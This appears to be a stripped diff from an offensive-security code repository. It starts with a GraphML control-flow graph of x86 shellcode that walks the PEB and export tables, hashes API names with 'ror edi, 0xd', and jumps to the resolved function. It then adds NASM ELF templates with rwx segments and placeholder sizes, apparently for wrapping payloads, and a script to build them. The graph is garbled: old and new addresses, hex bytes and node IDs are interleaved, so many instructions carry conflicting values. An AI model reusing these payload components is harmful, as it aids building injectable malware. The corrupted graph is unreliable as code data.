<data key="instruction.source">mov edx, dword ptr [edx + 0x10]</data>
</node>
<node id="block.0x1029:instruction.0x102e">
<data key="address">0x102e</data>
<node id="block.0x102c:instruction.0x1031">
<data key="address">0x1031</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b423c</data>
<data key="instruction.source">mov eax, dword ptr [edx + 0x3c]</data>
</node>
<node id="block.0x1029:instruction.0x1031">
<data key="address">0x1031</data>
<node id="block.0x102c:instruction.0x1034">
<data key="address">0x1034</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d0</data>
<data key="instruction.source">add eax, edx</data>
</node>
<node id="block.0x1029:instruction.0x1033">
<data key="address">0x1033</data>
<node id="block.0x102c:instruction.0x1036">
<data key="address">0x1036</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b4078</data>
<data key="instruction.source">mov eax, dword ptr [eax + 0x78]</data>
</node>
<node id="block.0x1029:instruction.0x1036">
<data key="address">0x1036</data>
<node id="block.0x102c:instruction.0x1039">
<data key="address">0x1039</data>
<data key="type">instruction</data>
<data key="instruction.hex">85c0</data>
<data key="instruction.source">test eax, eax</data>
</node>
<node id="block.0x1029:instruction.0x1038">
<data key="address">0x1038</data>
<node id="block.0x102c:instruction.0x103b">
<data key="address">0x103b</data>
<data key="type">instruction</data>
<data key="instruction.hex">744c</data>
<data key="instruction.source">je 0x1086</data>
<data key="instruction.hex">744a</data>
<data key="instruction.source">je 0x1087</data>
</node>
<edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102a"/>
<edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102b"/>
<edge source="block.0x1029:instruction.0x102a" target="block.0x1029:instruction.0x1038"/>
<edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x102e"/>
<edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x1031"/>
<edge source="block.0x1029:instruction.0x102e" target="block.0x1029:instruction.0x1031"/>
<edge source="block.0x1029:instruction.0x1031" target="block.0x1029:instruction.0x1033"/>
<edge source="block.0x1029:instruction.0x1033" target="block.0x1029:instruction.0x1036"/>
<edge source="block.0x1029:instruction.0x1036" target="block.0x1029:instruction.0x1038"/>
<edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102d"/>
<edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102e"/>
<edge source="block.0x102c:instruction.0x102d" target="block.0x102c:instruction.0x103b"/>
<edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1031"/>
<edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1034"/>
<edge source="block.0x102c:instruction.0x1031" target="block.0x102c:instruction.0x1034"/>
<edge source="block.0x102c:instruction.0x1034" target="block.0x102c:instruction.0x1036"/>
<edge source="block.0x102c:instruction.0x1036" target="block.0x102c:instruction.0x1039"/>
<edge source="block.0x102c:instruction.0x1039" target="block.0x102c:instruction.0x103b"/>
</graph>
</node>
<node id="block.0x103a">
<data key="address">0x103a</data>
<node id="block.0x103d">
<data key="address">0x103d</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x103a</data>
<data key="address">0x103d</data>
<data key="type">block</data>
<node id="block.0x103a:instruction.0x103a">
<data key="address">0x103a</data>
<node id="block.0x103d:instruction.0x103d">
<data key="address">0x103d</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d0</data>
<data key="instruction.source">add eax, edx</data>
</node>
<node id="block.0x103a:instruction.0x103c">
<data key="address">0x103c</data>
<node id="block.0x103d:instruction.0x103f">
<data key="address">0x103f</data>
<data key="type">instruction</data>
<data key="instruction.hex">50</data>
<data key="instruction.source">push eax</data>
</node>
<node id="block.0x103a:instruction.0x103d">
<data key="address">0x103d</data>
<node id="block.0x103d:instruction.0x1040">
<data key="address">0x1040</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b4818</data>
<data key="instruction.source">mov ecx, dword ptr [eax + 0x18]</data>
</node>
<node id="block.0x103a:instruction.0x1040">
<data key="address">0x1040</data>
<node id="block.0x103d:instruction.0x1043">
<data key="address">0x1043</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b5820</data>
<data key="instruction.source">mov ebx, dword ptr [eax + 0x20]</data>
</node>
<node id="block.0x103a:instruction.0x1043">
<data key="address">0x1043</data>
<node id="block.0x103d:instruction.0x1046">
<data key="address">0x1046</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d3</data>
<data key="instruction.source">add ebx, edx</data>
</node>
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103c"/>
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103d"/>
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x1040"/>
<edge source="block.0x103a:instruction.0x1040" target="block.0x103a:instruction.0x1043"/>
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x103f"/>
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1040"/>
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1043"/>
<edge source="block.0x103d:instruction.0x1043" target="block.0x103d:instruction.0x1046"/>
</graph>
</node>
<node id="block.0x1045">
<data key="address">0x1045</data>
<node id="block.0x1048">
<data key="address">0x1048</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1045</data>
<data key="address">0x1048</data>
<data key="type">block</data>
<node id="block.0x1045:instruction.0x1045">
<data key="address">0x1045</data>
<node id="block.0x1048:instruction.0x1048">
<data key="address">0x1048</data>
<data key="type">instruction</data>
<data key="instruction.hex">85c9</data>
<data key="instruction.source">test ecx, ecx</data>
</node>
<node id="block.0x1045:instruction.0x1047">
<data key="address">0x1047</data>
<node id="block.0x1048:instruction.0x104a">
<data key="address">0x104a</data>
<data key="type">instruction</data>
<data key="instruction.hex">743c</data>
<data key="instruction.source">je 0x1085</data>
<data key="instruction.hex">743a</data>
<data key="instruction.source">je 0x1086</data>
</node>
<edge source="block.0x1045:instruction.0x1045" target="block.0x1045:instruction.0x1047"/>
<edge source="block.0x1048:instruction.0x1048" target="block.0x1048:instruction.0x104a"/>
</graph>
</node>
<node id="block.0x1049">
<data key="address">0x1049</data>
<node id="block.0x104c">
<data key="address">0x104c</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1049</data>
<data key="address">0x104c</data>
<data key="type">block</data>
<node id="block.0x1049:instruction.0x1049">
<data key="address">0x1049</data>
<node id="block.0x104c:instruction.0x104c">
<data key="address">0x104c</data>
<data key="type">instruction</data>
<data key="instruction.hex">49</data>
<data key="instruction.source">dec ecx</data>
</node>
<node id="block.0x1049:instruction.0x104a">
<data key="address">0x104a</data>
<node id="block.0x104c:instruction.0x104d">
<data key="address">0x104d</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b348b</data>
<data key="instruction.source">mov esi, dword ptr [ebx + ecx*4]</data>
</node>
<node id="block.0x1049:instruction.0x104d">
<data key="address">0x104d</data>
<node id="block.0x104c:instruction.0x1050">
<data key="address">0x1050</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d6</data>
<data key="instruction.source">add esi, edx</data>
</node>
<node id="block.0x1049:instruction.0x104f">
<data key="address">0x104f</data>
<node id="block.0x104c:instruction.0x1052">
<data key="address">0x1052</data>
<data key="type">instruction</data>
<data key="instruction.hex">31ff</data>
<data key="instruction.source">xor edi, edi</data>
<data key="instruction.hex">8b7df8</data>
<data key="instruction.source">mov edi, dword ptr [ebp - 8]</data>
</node>
<edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104d"/>
<edge source="block.0x1049:instruction.0x1049" target="block.0x1049:instruction.0x104a"/>
<edge source="block.0x1049:instruction.0x104a" target="block.0x1049:instruction.0x104d"/>
<edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x1050"/>
<edge source="block.0x104c:instruction.0x104c" target="block.0x104c:instruction.0x104d"/>
<edge source="block.0x104c:instruction.0x104d" target="block.0x104c:instruction.0x1050"/>
</graph>
</node>
<node id="block.0x1051">
<data key="address">0x1051</data>
<node id="block.0x1055">
<data key="address">0x1055</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1051</data>
<data key="address">0x1055</data>
<data key="type">block</data>
<node id="block.0x1051:instruction.0x1051">
<data key="address">0x1051</data>
<node id="block.0x1055:instruction.0x1055">
<data key="address">0x1055</data>
<data key="type">instruction</data>
<data key="instruction.hex">31c0</data>
<data key="instruction.source">xor eax, eax</data>
</node>
<node id="block.0x1051:instruction.0x1053">
<data key="address">0x1053</data>
<node id="block.0x1055:instruction.0x1057">
<data key="address">0x1057</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [esi]</data>
</node>
<node id="block.0x1051:instruction.0x1054">
<data key="address">0x1054</data>
<node id="block.0x1055:instruction.0x1058">
<data key="address">0x1058</data>
<data key="type">instruction</data>
<data key="instruction.hex">c1cf0d</data>
<data key="instruction.source">ror edi, 0xd</data>
</node>
<node id="block.0x1051:instruction.0x1057">
<data key="address">0x1057</data>
<node id="block.0x1055:instruction.0x105b">
<data key="address">0x105b</data>
<data key="type">instruction</data>
<data key="instruction.hex">01c7</data>
<data key="instruction.source">add edi, eax</data>
</node>
<node id="block.0x1051:instruction.0x1059">
<data key="address">0x1059</data>
<node id="block.0x1055:instruction.0x105d">
<data key="address">0x105d</data>
<data key="type">instruction</data>
<data key="instruction.hex">38e0</data>
<data key="instruction.source">cmp al, ah</data>
</node>
<node id="block.0x1051:instruction.0x105b">
<data key="address">0x105b</data>
<node id="block.0x1055:instruction.0x105f">
<data key="address">0x105f</data>
<data key="type">instruction</data>
<data key="instruction.hex">75f4</data>
<data key="instruction.source">jne 0x1051</data>
<data key="instruction.source">jne 0x1055</data>
</node>
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1053"/>
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1054"/>
<edge source="block.0x1051:instruction.0x1051" target="block.0x1051:instruction.0x1059"/>
<edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1057"/>
<edge source="block.0x1051:instruction.0x1053" target="block.0x1051:instruction.0x1059"/>
<edge source="block.0x1051:instruction.0x1054" target="block.0x1051:instruction.0x1057"/>
<edge source="block.0x1051:instruction.0x1057" target="block.0x1051:instruction.0x1059"/>
<edge source="block.0x1051:instruction.0x1059" target="block.0x1051:instruction.0x105b"/>
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1057"/>
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x1058"/>
<edge source="block.0x1055:instruction.0x1055" target="block.0x1055:instruction.0x105d"/>
<edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105b"/>
<edge source="block.0x1055:instruction.0x1057" target="block.0x1055:instruction.0x105d"/>
<edge source="block.0x1055:instruction.0x1058" target="block.0x1055:instruction.0x105b"/>
<edge source="block.0x1055:instruction.0x105b" target="block.0x1055:instruction.0x105d"/>
<edge source="block.0x1055:instruction.0x105d" target="block.0x1055:instruction.0x105f"/>
</graph>
</node>
<node id="block.0x105d">
<data key="address">0x105d</data>
<node id="block.0x1061">
<data key="address">0x1061</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x105d</data>
<data key="address">0x1061</data>
<data key="type">block</data>
<node id="block.0x105d:instruction.0x105d">
<data key="address">0x105d</data>
<data key="type">instruction</data>
<data key="instruction.hex">037df8</data>
<data key="instruction.source">add edi, dword ptr [ebp - 8]</data>
</node>
<node id="block.0x105d:instruction.0x1060">
<data key="address">0x1060</data>
<node id="block.0x1061:instruction.0x1061">
<data key="address">0x1061</data>
<data key="type">instruction</data>
<data key="instruction.hex">3b7d24</data>
<data key="instruction.source">cmp edi, dword ptr [ebp + 0x24]</data>
</node>
<node id="block.0x105d:instruction.0x1063">
<data key="address">0x1063</data>
<node id="block.0x1061:instruction.0x1064">
<data key="address">0x1064</data>
<data key="type">instruction</data>
<data key="instruction.hex">75e0</data>
<data key="instruction.source">jne 0x1045</data>
<data key="instruction.hex">75e2</data>
<data key="instruction.source">jne 0x1048</data>
</node>
<edge source="block.0x105d:instruction.0x105d" target="block.0x105d:instruction.0x1060"/>
<edge source="block.0x105d:instruction.0x1060" target="block.0x105d:instruction.0x1063"/>
<edge source="block.0x1061:instruction.0x1061" target="block.0x1061:instruction.0x1064"/>
</graph>
</node>
<node id="block.0x1065">
<data key="address">0x1065</data>
<node id="block.0x1066">
<data key="address">0x1066</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1065</data>
<data key="address">0x1066</data>
<data key="type">block</data>
<node id="block.0x1065:instruction.0x1065">
<data key="address">0x1065</data>
<node id="block.0x1066:instruction.0x1066">
<data key="address">0x1066</data>
<data key="type">instruction</data>
<data key="instruction.hex">58</data>
<data key="instruction.source">pop eax</data>
</node>
<node id="block.0x1065:instruction.0x1066">
<data key="address">0x1066</data>
<node id="block.0x1066:instruction.0x1067">
<data key="address">0x1067</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b5824</data>
<data key="instruction.source">mov ebx, dword ptr [eax + 0x24]</data>
</node>
<node id="block.0x1065:instruction.0x1069">
<data key="address">0x1069</data>
<node id="block.0x1066:instruction.0x106a">
<data key="address">0x106a</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d3</data>
<data key="instruction.source">add ebx, edx</data>
</node>
<node id="block.0x1065:instruction.0x106b">
<data key="address">0x106b</data>
<node id="block.0x1066:instruction.0x106c">
<data key="address">0x106c</data>
<data key="type">instruction</data>
<data key="instruction.hex">668b0c4b</data>
<data key="instruction.source">mov cx, word ptr [ebx + ecx*2]</data>
</node>
<node id="block.0x1065:instruction.0x106f">
<data key="address">0x106f</data>
<node id="block.0x1066:instruction.0x1070">
<data key="address">0x1070</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b581c</data>
<data key="instruction.source">mov ebx, dword ptr [eax + 0x1c]</data>
</node>
<node id="block.0x1065:instruction.0x1072">
<data key="address">0x1072</data>
<node id="block.0x1066:instruction.0x1073">
<data key="address">0x1073</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d3</data>
<data key="instruction.source">add ebx, edx</data>
</node>
<node id="block.0x1065:instruction.0x1074">
<data key="address">0x1074</data>
<node id="block.0x1066:instruction.0x1075">
<data key="address">0x1075</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b048b</data>
<data key="instruction.source">mov eax, dword ptr [ebx + ecx*4]</data>
</node>
<node id="block.0x1065:instruction.0x1077">
<data key="address">0x1077</data>
<node id="block.0x1066:instruction.0x1078">
<data key="address">0x1078</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d0</data>
<data key="instruction.source">add eax, edx</data>
</node>
<node id="block.0x1065:instruction.0x1079">
<data key="address">0x1079</data>
<node id="block.0x1066:instruction.0x107a">
<data key="address">0x107a</data>
<data key="type">instruction</data>
<data key="instruction.hex">89442424</data>
<data key="instruction.source">mov dword ptr [esp + 0x24], eax</data>
</node>
<node id="block.0x1065:instruction.0x107d">
<data key="address">0x107d</data>
<data key="type">instruction</data>
<data key="instruction.hex">5b</data>
<data key="instruction.source">pop ebx</data>
</node>
<node id="block.0x1065:instruction.0x107e">
<node id="block.0x1066:instruction.0x107e">
<data key="address">0x107e</data>
<data key="type">instruction</data>
<data key="instruction.hex">5b</data>
<data key="instruction.source">pop ebx</data>
</node>
<node id="block.0x1065:instruction.0x107f">
<node id="block.0x1066:instruction.0x107f">
<data key="address">0x107f</data>
<data key="type">instruction</data>
<data key="instruction.hex">5b</data>
<data key="instruction.source">pop ebx</data>
</node>
<node id="block.0x1066:instruction.0x1080">
<data key="address">0x1080</data>
<data key="type">instruction</data>
<data key="instruction.hex">61</data>
<data key="instruction.source">popal</data>
</node>
<node id="block.0x1065:instruction.0x1080">
<data key="address">0x1080</data>
<node id="block.0x1066:instruction.0x1081">
<data key="address">0x1081</data>
<data key="type">instruction</data>
<data key="instruction.hex">59</data>
<data key="instruction.source">pop ecx</data>
</node>
<node id="block.0x1065:instruction.0x1081">
<data key="address">0x1081</data>
<node id="block.0x1066:instruction.0x1082">
<data key="address">0x1082</data>
<data key="type">instruction</data>
<data key="instruction.hex">5a</data>
<data key="instruction.source">pop edx</data>
</node>
<node id="block.0x1065:instruction.0x1082">
<data key="address">0x1082</data>
<node id="block.0x1066:instruction.0x1083">
<data key="address">0x1083</data>
<data key="type">instruction</data>
<data key="instruction.hex">51</data>
<data key="instruction.source">push ecx</data>
</node>
<node id="block.0x1065:instruction.0x1083">
<data key="address">0x1083</data>
<node id="block.0x1066:instruction.0x1084">
<data key="address">0x1084</data>
<data key="type">instruction</data>
<data key="instruction.hex">ffe0</data>
<data key="instruction.source">jmp eax</data>
</node>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1066"/>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x106f"/>
<edge source="block.0x1065:instruction.0x1065" target="block.0x1065:instruction.0x1079"/>
<edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x1066" target="block.0x1065:instruction.0x1069"/>
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106f"/>
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1069" target="block.0x1065:instruction.0x106b"/>
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x106f"/>
<edge source="block.0x1065:instruction.0x106b" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x106f" target="block.0x1065:instruction.0x1072"/>
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x1074"/>
<edge source="block.0x1065:instruction.0x1072" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1074" target="block.0x1065:instruction.0x1077"/>
<edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x1077" target="block.0x1065:instruction.0x1079"/>
<edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107d"/>
<edge source="block.0x1065:instruction.0x1079" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x107d" target="block.0x1065:instruction.0x107e"/>
<edge source="block.0x1065:instruction.0x107e" target="block.0x1065:instruction.0x107f"/>
<edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1080"/>
<edge source="block.0x1065:instruction.0x107f" target="block.0x1065:instruction.0x1083"/>
<edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1081"/>
<edge source="block.0x1065:instruction.0x1080" target="block.0x1065:instruction.0x1082"/>
<edge source="block.0x1065:instruction.0x1081" target="block.0x1065:instruction.0x1082"/>
<edge source="block.0x1065:instruction.0x1082" target="block.0x1065:instruction.0x1083"/>
</graph>
</node>
<node id="block.0x1085">
<data key="address">0x1085</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1085</data>
<data key="type">block</data>
<node id="block.0x1085:instruction.0x1085">
<data key="address">0x1085</data>
<data key="type">instruction</data>
<data key="instruction.hex">58</data>
<data key="instruction.source">pop eax</data>
</node>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1067"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1070"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x107a"/>
<edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x1067" target="block.0x1066:instruction.0x106a"/>
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1070"/>
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x106a" target="block.0x1066:instruction.0x106c"/>
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1070"/>
<edge source="block.0x1066:instruction.0x106c" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x1070" target="block.0x1066:instruction.0x1073"/>
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1075"/>
<edge source="block.0x1066:instruction.0x1073" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1075" target="block.0x1066:instruction.0x1078"/>
<edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1078" target="block.0x1066:instruction.0x107a"/>
<edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x107e"/>
<edge source="block.0x1066:instruction.0x107a" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x107e" target="block.0x1066:instruction.0x107f"/>
<edge source="block.0x1066:instruction.0x107f" target="block.0x1066:instruction.0x1080"/>
<edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1081"/>
<edge source="block.0x1066:instruction.0x1080" target="block.0x1066:instruction.0x1084"/>
<edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1082"/>
<edge source="block.0x1066:instruction.0x1081" target="block.0x1066:instruction.0x1083"/>
<edge source="block.0x1066:instruction.0x1082" target="block.0x1066:instruction.0x1083"/>
<edge source="block.0x1066:instruction.0x1083" target="block.0x1066:instruction.0x1084"/>
</graph>
</node>
<node id="block.0x1086">
@@ -566,44 +545,58 @@
<node id="block.0x1086:instruction.0x1086">
<data key="address">0x1086</data>
<data key="type">instruction</data>
<data key="instruction.hex">58</data>
<data key="instruction.source">pop eax</data>
</node>
</graph>
</node>
<node id="block.0x1087">
<data key="address">0x1087</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1087</data>
<data key="type">block</data>
<node id="block.0x1087:instruction.0x1087">
<data key="address">0x1087</data>
<data key="type">instruction</data>
<data key="instruction.hex">5f</data>
<data key="instruction.source">pop edi</data>
</node>
<node id="block.0x1086:instruction.0x1087">
<data key="address">0x1087</data>
<node id="block.0x1087:instruction.0x1088">
<data key="address">0x1088</data>
<data key="type">instruction</data>
<data key="instruction.hex">5a</data>
<data key="instruction.source">pop edx</data>
</node>
<node id="block.0x1086:instruction.0x1088">
<data key="address">0x1088</data>
<node id="block.0x1087:instruction.0x1089">
<data key="address">0x1089</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b12</data>
<data key="instruction.source">mov edx, dword ptr [edx]</data>
</node>
<node id="block.0x1086:instruction.0x108a">
<data key="address">0x108a</data>
<node id="block.0x1087:instruction.0x108b">
<data key="address">0x108b</data>
<data key="type">instruction</data>
<data key="instruction.hex">eb83</data>
<data key="instruction.hex">eb82</data>
<data key="instruction.source">jmp 0x100f</data>
</node>
<edge source="block.0x1086:instruction.0x1086" target="block.0x1086:instruction.0x1087"/>
<edge source="block.0x1086:instruction.0x1087" target="block.0x1086:instruction.0x1088"/>
<edge source="block.0x1086:instruction.0x1088" target="block.0x1086:instruction.0x108a"/>
<edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x1088"/>
<edge source="block.0x1087:instruction.0x1088" target="block.0x1087:instruction.0x1089"/>
<edge source="block.0x1087:instruction.0x1089" target="block.0x1087:instruction.0x108b"/>
</graph>
</node>
<edge source="block.0x1000" target="block.0x100f"/>
<edge source="block.0x100f" target="block.0x1018"/>
<edge source="block.0x1018" target="block.0x101f"/>
<edge source="block.0x101f" target="block.0x1021"/>
<edge source="block.0x1021" target="block.0x1029"/>
<edge source="block.0x1029" target="block.0x103a"/>
<edge source="block.0x103a" target="block.0x1045"/>
<edge source="block.0x1045" target="block.0x1049"/>
<edge source="block.0x1049" target="block.0x1051"/>
<edge source="block.0x1051" target="block.0x105d"/>
<edge source="block.0x105d" target="block.0x1065"/>
<edge source="block.0x1065" target="block.0x1085"/>
<edge source="block.0x1085" target="block.0x1086"/>
<edge source="block.0x100f" target="block.0x101b"/>
<edge source="block.0x101b" target="block.0x1022"/>
<edge source="block.0x1022" target="block.0x1024"/>
<edge source="block.0x1024" target="block.0x102c"/>
<edge source="block.0x102c" target="block.0x103d"/>
<edge source="block.0x103d" target="block.0x1048"/>
<edge source="block.0x1048" target="block.0x104c"/>
<edge source="block.0x104c" target="block.0x1055"/>
<edge source="block.0x1055" target="block.0x1061"/>
<edge source="block.0x1061" target="block.0x1066"/>
<edge source="block.0x1066" target="block.0x1086"/>
<edge source="block.0x1086" target="block.0x1087"/>
</graph>
</graphml>
@@ -88,5 +88,7 @@ strtab:
db 0
db 0
strtabsz equ $ - strtab
align 4
global _start
_start:
@@ -0,0 +1,99 @@
; build with:
; nasm elf_dll_loongarch64_template.s -f bin -o template_loongarch64_linux_dll.bin
BITS 64
org 0
ehdr: ; Elf64_Ehdr
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 3 ; e_type = ET_DYN
dw 0x102 ; e_machine = LOONGARCH
dd 1 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq shdr - $$ ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw shentsize ; e_shentsize
dw 2 ; e_shnum
dw 1 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dq dynsection ; p_offset
dq dynsection ; p_vaddr
dq dynsection ; p_vaddr
dq dynsz ; p_filesz
dq dynsz ; p_memsz
dq 0x1000 ; p_align
shdr:
dd 1 ; sh_name
dd 6 ; sh_type = SHT_DYNAMIC
dq 0 ; sh_flags
dq dynsection ; sh_addr
dq dynsection ; sh_offset
dq dynsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 8 ; sh_addralign
dq 7 ; sh_entsize
shentsize equ $ - shdr
dd 0 ; sh_name
dd 3 ; sh_type = SHT_STRTAB
dq 0 ; sh_flags
dq strtab ; sh_addr
dq strtab ; sh_offset
dq strtabsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 0 ; sh_addralign
dq 0 ; sh_entsize
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
; DT_STRSZ
dq 0x0a
dq 0
; DT_SYMENT
dq 0x0b
dq 0
; DT_NULL
dq 0x00
dq 0
dynsz equ $ - dynsection
strtab:
db 0
db 0
strtabsz equ $ - strtab
align 16
global _start
_start:
@@ -94,5 +94,6 @@ strtab:
db 0
strtabsz equ $ - strtab
align 4
global _start
_start:
+8
View File
@@ -0,0 +1,8 @@
#!/bin/sh
dst_folder="../../../"
for file in $(find ./ -name "*.s")
do
arch=`echo $file | cut -d "_" -f2`;
nasm -f bin $file -o $dst_folder"template_"$arch"_linux.bin"
done
@@ -1,7 +1,6 @@
; build with:
; nasm elf_aarch64_template.s -f bin -o template_aarch64_linux.bin
BITS 64
org 0x400000
ehdr: ; Elf32_Ehdr
@@ -0,0 +1,37 @@
; build with:
; nasm elf_armbe_template.s -f bin -o template_armbe_linux.bin
BITS 32
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 0x0200 ; e_type = ET_EXEC for an executable
dw 0x2800 ; e_machine = ARM
dd 0x01000000 ; e_version
dd 0x54800000 ; e_entry
dd 0x34000000 ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw 0x3400 ; e_ehsize
dw 0x2000 ; e_phentsize
dw 0x0100 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 0x01000000 ; p_type = pt_load
dd 0 ; p_offset
dd 0x00800000 ; p_vaddr
dd 0x00800000 ; p_paddr
dd 0xefbeadde ; p_filesz
dd 0xefbeadde ; p_memsz
dd 0x07000000 ; p_flags = rwx
dd 0x00100000 ; p_align
phdrsize equ $ - phdr
_start:
+42
View File
@@ -0,0 +1,42 @@
; build with:
; nasm elf_loongarch64_template.s -f bin -o template_loongarch64_linux.bin
BITS 64
org 0x80400000
ehdr: ; Elf32_Ehdr
